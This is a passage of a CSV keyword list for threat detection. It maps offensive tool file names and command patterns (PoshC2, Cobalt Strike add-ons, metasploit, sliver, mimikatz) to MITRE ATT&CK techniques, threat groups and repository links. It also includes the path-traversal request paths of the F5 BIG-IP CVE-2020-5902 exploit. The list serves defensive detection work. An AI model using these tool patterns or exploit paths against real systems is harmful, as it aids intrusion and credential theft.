T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*PortBender.sln*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*PortBender.zip*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*portfwd add ?l *-p *-r *","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Port forwarding","10","10","N/A","N/A","N/A","N/A" +"*portfwd add --bind *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*portfwd add -r *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*portscan*","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/zs5460/portscan","1","0","N/A","N/A","1","13","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" +"*portscan.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*portscan_result.cna*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*portscan386 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*portscan64 *","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*PortScan-Alive*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*portscanner.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*portscanner.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*Portscan-Port*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*portScanWithService.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*portScanWithService.py*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*portswigger.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*portswigger.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*posh_in_mem*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*posh_stageless.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*Posh_v4_dropper_*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Posh_v4_x64_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Posh_v4_x86_*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*PoshC2-*.zip*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2.server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2.service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshc2-ansible-main.yml*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-cookie-decryptor*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-delete *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*poshkatz.psd1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Stealthbits/poshkatz","1","1","N/A","10","3","210","33","2019-12-28T15:53:40Z","2018-10-29T16:07:40Z" +"*posh-project *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-project -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-server -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-server -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-update *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*POST */tmui/login.jsp/.. /tmui/locallb/workspace/fileSave.jsp*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*post/windows/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can 